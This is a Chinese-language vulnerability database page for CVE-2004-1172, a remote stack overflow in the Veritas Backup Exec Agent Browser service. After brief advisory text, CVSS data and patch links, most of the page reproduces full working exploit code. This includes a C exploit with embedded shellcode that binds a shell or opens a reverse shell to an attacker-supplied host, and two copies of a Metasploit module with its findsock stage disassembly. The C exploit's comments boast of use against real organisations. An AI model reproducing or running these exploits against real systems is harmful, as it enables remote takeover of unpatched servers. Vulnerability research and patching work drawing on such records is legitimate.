CVE-2004-1172
CVSS10.0
发布时间 :2005-01-10 00:00:00
修订时间 :2008-09-05 16:40:35
NMCOEPS    

[原文]Stack-based buffer overflow in the Agent Browser in Veritas Backup Exec 8.x before 8.60.3878 Hotfix 68, and 9.x before 9.1.4691 Hotfix 40, allows remote attackers to execute arbitrary code via a registration request with a long hostname.


[CNNVD]Symantec VeritasBackupExec AgentBrowser 缓冲区溢出漏洞(CNNVD-200501-208)

        Veritas Backup Exec是一款备份恢复解决方案软件。
        Veritas Backup Exec 8.x中8.60.3878 Hotfix 68之前版本及9.x中9.1.4691 Hotfix 40之前版本的Agent Browser存在堆栈溢出漏洞。
        远程攻击者可通过带有超长hostname的注册请求利用此漏洞,执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:symantec_veritas:backup_exec:9.0
cpe:/a:symantec_veritas:backup_exec:8.0
cpe:/a:symantec_veritas:backup_exec:9.1
cpe:/a:symantec_veritas:backup_exec:8.5
cpe:/a:symantec_veritas:backup_exec:8.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1172
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1172
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-208
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/907729
(UNKNOWN)  CERT-VN  VU#907729
http://www.securityfocus.com/bid/11974
(VENDOR_ADVISORY)  BID  11974
http://xforce.iss.net/xforce/xfdb/18506
(UNKNOWN)  XF  netbackup-agent-browser-bo(18506)
http://www.idefense.com/application/poi/display?id=169
(UNKNOWN)  IDEFENSE  20041216 Veritas Backup Exec Agent Browser Registration Request Buffer Overflow Vulnerability
http://www.frsirt.com/exploits/20050111.101_BXEC.cpp.php
(UNKNOWN)  MISC  http://www.frsirt.com/exploits/20050111.101_BXEC.cpp.php
http://seer.support.veritas.com/docs/273850.htm
(UNKNOWN)  CONFIRM  http://seer.support.veritas.com/docs/273850.htm
http://seer.support.veritas.com/docs/273422.htm
(UNKNOWN)  CONFIRM  http://seer.support.veritas.com/docs/273422.htm
http://seer.support.veritas.com/docs/273420.htm
(UNKNOWN)  CONFIRM  http://seer.support.veritas.com/docs/273420.htm
http://seer.support.veritas.com/docs/273419.htm
(UNKNOWN)  CONFIRM  http://seer.support.veritas.com/docs/273419.htm
http://secunia.com/advisories/13495/
(UNKNOWN)  SECUNIA  13495

- 漏洞信息

Symantec VeritasBackupExec AgentBrowser 缓冲区溢出漏洞
危急 缓冲区溢出
2005-01-10 00:00:00 2006-03-27 00:00:00
远程  
        Veritas Backup Exec是一款备份恢复解决方案软件。
        Veritas Backup Exec 8.x中8.60.3878 Hotfix 68之前版本及9.x中9.1.4691 Hotfix 40之前版本的Agent Browser存在堆栈溢出漏洞。
        远程攻击者可通过带有超长hostname的注册请求利用此漏洞,执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://seer.support.veritas.com/docs/273419.htm

- 漏洞信息 (750)

Veritas Backup Exec Agent 8.x/9.x Browser Overflow (c version) (EDBID:750)
windows remote
2005-01-11 Verified
6101 class101
N/A [点击下载]
/* Got to give it to class101 on this one.  
 * Tested and penetrated. / str0ke 
 */

/*
VERITAS Backup Exec v9.1.4691.SP1
                    v9.1.4691.SP0
     v8.5.3572
Agent Browser Service, Remote Stack Overflow
 
Highly Critical
 
All credits to:
 
-iDEFENSE(discovery-www.iDEFENSE.com),
-Thor Doomen(iat-syscall[at]inbox.lv),
-H.D. Moore(scode-www.metasploit.com),
-Matt Miller(scode-www.hick.org)
 
ExtraNotes:
 
All my tests/debugs where a bit long (some days) firstly due to the big size
of Backup Exec and the unstability accross differents windows versions
to make working that IAT method with 100% success and the difficulty to debug it.
(As a recall, due to the 60 bytes only free, a tiny shellcode is send in first to scan
the recv function of benetns.exe and jump to the data submitted during the second send,
thanx syscall. Let's think large now. Imagine that you exploits the hole and you submit
the shellcode 5 minutes later, the service will hang on to death of course until a kill,
now imagine that you exploits the hole and you submit the shellcode too faslty for the,
computer processing, the shellcode can be missed, wont be executed again, sometimes yes/no, but really unstable.
Hopefully (or unfortunely for you admin :>) I'm here to optimize it and make it 100% working, universal,
stable whatever you want for the good fortune of script kiddies and to show what mean working to my good
friends ka-odick :>
                                                 Tries
   Machine           Bind  / Rverse / Success
 
 (2x) Win2k SP4   Server English      10        10       20
 (1x) Win2k SP4   Pro    English       5         5       10
 (1x) WinXP SP1   Pro    English       5         5       10
 (1x) WinXP SP1a  Pro    English       5         5       10
 (3x) Win2003 SP0 Server English       5         5       10
 (1x) Win2003 SP0 Server Ita.          5         5       10
 (1x) NT4         Server English.      5         5       10
 
            = Universal
 
v0.1:
C code based on Thor Doomen's code posted at the metasploit mailing list,
excellent in the method, but super unstable to not say not working when used,
made some changes.
 
v0.2:
fix of the first big problem , the missed shellcode accross differents windows,
fixed by flooding benetns with more sends, timer really small, this is important.
padding 1 nop to the reverse shellcode as needed, else crash on reverse.
 
v0.3:
universal esi call across v9.1 SP0 and SP1, for the good fortune of script kiddies.
 
v0.4:
As a warning, this poc v0.4 as been tested working by an anonymous tester (never mentionned there)
on some organisations such nasa, states/edus, it's urgent to update 1 month after the advisory, sleepers.
 
Tips: -make sure that your ip is safe of null bytes in reverse mode.
      -make sure that you targets the good version of Backup Exec,
      else you crash it.
   -Backup Exec v10.0 is now available, get it at www.veritas.com.
   -Visit dfind.kd-team.com for a patched benetns.exe, quick solution
   for an urgent update. (extracted from the hotfix at www.veritas.com)
      Backup Exec 9.x is tested safe after replacing the .exe
 
Greetings:
   Nima Majidi
   Behrang Fouladi
   Pejman
   keystr0ke
   JGS
   DiabloHorn
   kimatrix
   NaV
   New Metasploit v2.3 (http://www.metasploit.com/)
   and all idlers of #n3ws on Eris Free Network.
 
by class101 [at] hat-squad.com
answering to all stupid questions that I got & will have, no I'm not persian and you don't care where I come from.
 
04 January 2005
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
 
char scode1[]=
//file://Matt Millers 'skape' shellcode.
"\x90"  // pad needed their for me, if you get scode detection problems on slow connections,
//file://try to add more NOP and make sure to update the memcpys later in the code.
"\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad"
"\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24"
"\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"
"\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"
"\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03"
"\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa9\xff"
"\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72"
"\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"
"\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"
"\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f"
"\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8\x01\x63"
"\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0"
"\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0"
"\x68\x7f\x01\x01\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50"
"\x53\x56\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6"
"\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x77\x44"
"\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50"
"\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff\x55\x0c\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 

char scode2[]=
//file://HD.Moore Shellcode
//file://"\x90"   uncomment this if you have scode detection problem on slows connections or try more NOP,
//file://but for me and some other guys its already fine like this.
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90"; 
 
static char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
char v85[]="\xFF\x38\x11\x40";
char esiold[]="\xB9\x08\x43\x01";
 
char talk[] =
"\x02\x00\x32\x00"
"\x90\x90\x90\x90"
"\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"
"\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"
"\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"
"\xE1\xFF\xE7\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x00"
"1.1.1.1.1.1"
"\x00"
"\xEB\x80";
 
#ifdef WIN32
 WSADATA wsadata;
#endif
 
void ver();
void usage(char* us);
 
int main(int argc,char *argv[])
{
 ver();
 unsigned long gip;
 unsigned short gport;
 char *os;
 if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;} 
 if (argc==5){usage(argv[0]);return -1;} 
    if (strlen(argv[2])<7){usage(argv[0]);return -1;} 
    if (argc==6)
 {
        if (strlen(argv[4])<7){usage(argv[0]);return -1;} 
 }
#ifndef WIN32
 if (argc==6)
 {
   gip=inet_addr(argv[4])^(long)0x00000000;
  gport=htons(atoi(argv[5]))^(short)0x0000;
 }
#define Sleep  sleep
#define SOCKET  int
#define closesocket(s) close(s)
#else
 if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
 if (argc==6)
 {
  gip=inet_addr(argv[4])^(ULONG)0x00000000;
  gport=htons(atoi(argv[5]))^(USHORT)0x0000;
 }
#endif
 int ip=htonl(inet_addr(argv[2])), port;
 if (argc==4||argc==6){port=atoi(argv[3]);} else port=6101;
 SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
 s=socket(AF_INET,SOCK_STREAM,0);
 if (s==-1){printf("[+] socket() error\n");return -1;} 
 if (atoi(argv[1])==1) {memcpy(&talk[37], &v91sp0sp1, 4);memcpy(&talk[72], &esisp0sp1, 4);os="Backup Exec v9.1.4691.1\n[+]            Backup Exec v9.1.4691.0";}
 else {memcpy(&talk[37], &v85, 4);memcpy(&talk[72], &esiold, 4);os="Backup Exec v8.5.3572";}
 if (argc==6)
 {
  memcpy(&scode1[282], &gip, 4);
  memcpy(&scode1[289], &gport, 2);
  strcat(payload,scode1);
 }
 else strcat(payload,scode2);
 printf("[+] target(s): %s\n",os);   
 server.sin_family=AF_INET;
 server.sin_addr.s_addr=htonl(ip);
 server.sin_port=htons(port);
 connect(s,( struct sockaddr *)&server,sizeof(server));
 timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
 switch(select(s+1,NULL,&mask,NULL,&timeout))
 {
  case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
  case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
  default:
  if(FD_ISSET(s,&mask))
  {
   printf("[+] connected, constructing the payload...\n");
   if (send(s,talk,sizeof(talk)-1,0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 2, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
 
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 3, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
 
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 4, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
 
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 5, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 6, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 7, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 8, the server is patched.\n");return -1;}
#ifdef WIN32
   Sleep(1000);
#else
   Sleep(1);
#endif   
   printf("[+] size of payload: %d\n",(sizeof(talk)-1)+strlen(payload)*7);   
   printf("[+] payload sent.\n");
   return 0;
  }
 }
 closesocket(s);
#ifdef WIN32
 WSACleanup();
#endif
 return 0;
}
 

void usage(char* us)
{ 
 printf("USAGE:\n");
 printf("      [+]  . 101_BXEC.exe Version VulnIP\n");
 printf("      [+]  . 101_BXEC.exe Version VulnIP VulnPORT\n");
 printf("      [+]  . 101_BXEC.exe Version VulnIP VulnPORT GayIP GayPORT\n");
 printf("VERSION:                               \n");
 printf("      [+] 1. Backup Exec v9.1.4691.SP1\n");
 printf("      [+] 1. Backup Exec v9.1.4691.SP0\n");
 printf("      [+] 2. Backup Exec v8.5.3572\n");
 printf("TARGET:                               \n");
 printf("      [+]  . 2k3/2k/XP/NT4 universal (*)\n");
 printf("NOTE:                               \n");
 printf("      The exploit bind a cmdshell port 101 or\n");
 printf("      reverse a cmdshell on your listener.\n");
 printf("      A wildcard (*) mean tested working.\n");
 printf("      Compilation msvc6, cygwin, Linux.\n");
 return;
}
void ver()
{ 
 printf("                                                                   \n");
 printf("        ================================================[0.4]========\n");
 printf("        =================VERITAS Backup Exec 8.x/9.x=================\n");
 printf("        =========Agent Browser Service, Remote Stack Overflow========\n");
 printf("        ======coded by class101=============[Hat-Squad.com 2005]=====\n");
 printf("        =============================================================\n");
 printf("                                                                   \n");
}

// milw0rm.com [2005-01-11]
		

- 漏洞信息 (16331)

Veritas Backup Exec Name Service Overflow (EDBID:16331)
windows remote
2010-06-22 Verified
0 metasploit
N/A [点击下载]
##
# $Id: name_service.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Veritas Backup Exec Name Service Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the Veritas Backup
				Exec Agent Browser service. This vulnerability occurs when a
				recv() call has a length value too long for the	destination
				stack buffer. By sending an agent name value of 63 bytes or
				more, we can overwrite the return address of the recv
				function. Since we only have ~60 bytes of contiguous space
				for shellcode, a tiny findsock payload is sent which uses a
				hardcoded IAT address for the recv() function. This payload
				will then roll the stack back to the beginning of the page,
				recv() the real shellcode into it, and jump to it. This
				module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
				8.6.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2004-1172'],
					[ 'OSVDB', '12418'],
					[ 'BID', '11974'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'MinNops'  => 512,
					'MinNops'  => 512,
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
						{
							'Platform' => 'win',
							'Rets'     => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
						},
					],
					[
						'Veritas BE 8.5',
						{
							'Platform' => 'win',
							'Rets'     => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
						},
					],
				],
			'DisclosureDate' => 'Dec 16 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(6101)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
		# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
		# nulls: [0x00401150 -> 0x401150FF]
		stage_code = "\xfc" * 112
		stage_read =
			"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+
			"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+
			"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"

		# Configure the IAT for the recv call
		stage_read[29, 4] = [ target['Rets'][1] ].pack('V')

		# Stuff it all into one request
		stage_code[2, stage_read.length] = stage_read

		# Create the registration request
		req =
			"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+
			"1.1.1.1.1.1\x00" + "\xeb\x81"

		print_status("Sending the agent registration request of #{req.length} bytes...")
		sock.put(req)

		print_status("Sending the payload stage down the socket...")
		sock.put(payload.encoded)

		print_status("Waiting for the payload to execute...")
		select(nil,nil,nil,2)

		handler
		disconnect
	end

end


__END__
[ findsock stage ]
00000000  31F6              xor esi,esi
00000002  C1EC0C            shr esp,0xc
00000005  C1E40C            shl esp,0xc
00000008  89E7              mov edi,esp
0000000A  89FB              mov ebx,edi
0000000C  6A01              push byte +0x1
0000000E  8B7424FE          mov esi,[esp-0x2]
00000012  31D2              xor edx,edx
00000014  52                push edx
00000015  42                inc edx
00000016  C1E210            shl edx,0x10
00000019  52                push edx
0000001A  57                push edi
0000001B  56                push esi
0000001C  B8FF501140        mov eax,0x401150ff
00000021  C1E808            shr eax,0x8
00000024  FF10              call near [eax]
00000026  85C0              test eax,eax
00000028  7907              jns 0x31
0000002A  89DC              mov esp,ebx
0000002C  4E                dec esi
0000002D  85F6              test esi,esi
0000002F  75E1              jnz 0x12
00000031  FFD7              call edi
		

- 漏洞信息 (F83019)

Veritas Backup Exec Name Service Overflow (PacketStormID:F83019)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,shellcode
CVE-2004-1172
[点击下载]

This Metasploit module exploits a vulnerability in the Veritas Backup Exec Agent Browser service. This vulnerability occurs when a recv() call has a length value too long for the destination stack buffer. By sending an agent name value of 63 bytes or more, we can overwrite the return address of the recv function. Since we only have ~60 bytes of contiguous space for shellcode, a tiny findsock payload is sent which uses a hardcoded IAT address for the recv() function. This payload will then roll the stack back to the beginning of the page, recv() the real shellcode into it, and jump to it. This Metasploit module has been tested against Veritas 9.1 SP0, 9.1 SP1, and 8.6.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Veritas Backup Exec Name Service Overflow',
			'Description'    => %q{
				This module exploits a vulnerability in the Veritas Backup
				Exec Agent Browser service. This vulnerability occurs when a
				recv() call has a length value too long for the	destination
				stack buffer. By sending an agent name value of 63 bytes or
				more, we can overwrite the return address of the recv
				function. Since we only have ~60 bytes of contiguous space
				for shellcode, a tiny findsock payload is sent which uses a
				hardcoded IAT address for the recv() function. This payload
				will then roll the stack back to the beginning of the page,
				recv() the real shellcode into it, and jump to it. This
				module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
				8.6.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-1172'],
					[ 'OSVDB', '12418'],
					[ 'BID', '11974'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'MinNops'  => 512,
					'MinNops'  => 512,
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 
						'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
						{
							'Platform' => 'win',
							'Rets'     => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
						},
					],
					[ 
						'Veritas BE 8.5',
						{
							'Platform' => 'win',
							'Rets'     => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
						},
					],					
				],
			'DisclosureDate' => 'Dec 16 2004',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(6101)
				], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
		# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
		# nulls: [0x00401150 -> 0x401150FF]
		stage_code = "\xfc" * 112
		stage_read = 
			"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+
			"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+
			"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"
	
		# Configure the IAT for the recv call
		stage_read[29, 4] = [ target['Rets'][1] ].pack('V')
		
		# Stuff it all into one request
		stage_code[2, stage_read.length] = stage_read
		
		# Create the registration request
		req =  
			"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+
			"1.1.1.1.1.1\x00" + "\xeb\x81"
	  	
		print_status("Sending the agent registration request of #{req.length} bytes...")
		sock.put(req)
		
		print_status("Sending the payload stage down the socket...")
		sock.put(payload.encoded)

		print_status("Waiting for the payload to execute...")		
		sleep(2)
		
		handler
		disconnect
	end

end
	

__END__
[ findsock stage ]
00000000  31F6              xor esi,esi
00000002  C1EC0C            shr esp,0xc
00000005  C1E40C            shl esp,0xc
00000008  89E7              mov edi,esp
0000000A  89FB              mov ebx,edi
0000000C  6A01              push byte +0x1
0000000E  8B7424FE          mov esi,[esp-0x2]
00000012  31D2              xor edx,edx
00000014  52                push edx
00000015  42                inc edx
00000016  C1E210            shl edx,0x10
00000019  52                push edx
0000001A  57                push edi
0000001B  56                push esi
0000001C  B8FF501140        mov eax,0x401150ff
00000021  C1E808            shr eax,0x8
00000024  FF10              call near [eax]
00000026  85C0              test eax,eax
00000028  7907              jns 0x31
0000002A  89DC              mov esp,ebx
0000002C  4E                dec esi
0000002D  85F6              test esi,esi
0000002F  75E1              jnz 0x12
00000031  FFD7              call edi
    

- 漏洞信息 (F35676)

veritasABS.c (PacketStormID:F35676)
2005-01-12 00:00:00
class101  
exploit,remote,overflow,shell
CVE-2004-1172
[点击下载]

Remote stack overflow exploit for Veritas Backup Exec. Works for versions 9.1.4691.SP1, 9.1.4691.SP0, and 8.5.3572. Allows for a shell to be bound to port 101 or it spawn a reverse shell as well.

- 漏洞信息 (F35380)

iDEFENSE Security Advisory 2004-12-16.5 (PacketStormID:F35380)
2004-12-30 00:00:00
Patrik Karlsson,iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary,tcp
CVE-2004-1172
[点击下载]

iDEFENSE Security Advisory 12.16.2004-5 - Remote exploitation of a stack-based buffer overflow vulnerability in Veritas Backup Exec allows attackers to execute arbitrary code. The vulnerability specifically exists within the function responsible for receiving and parsing registration requests. The registration request packet contains the hostname and connecting TCP port of the client which is stored in an array on the stack. An attacker can send a registration request with an overly long hostname value to overflow the array and take control of the saved return address to execute arbitrary code.

Veritas Backup Exec Agent Browser Registration Request Buffer Overflow
Vulnerability

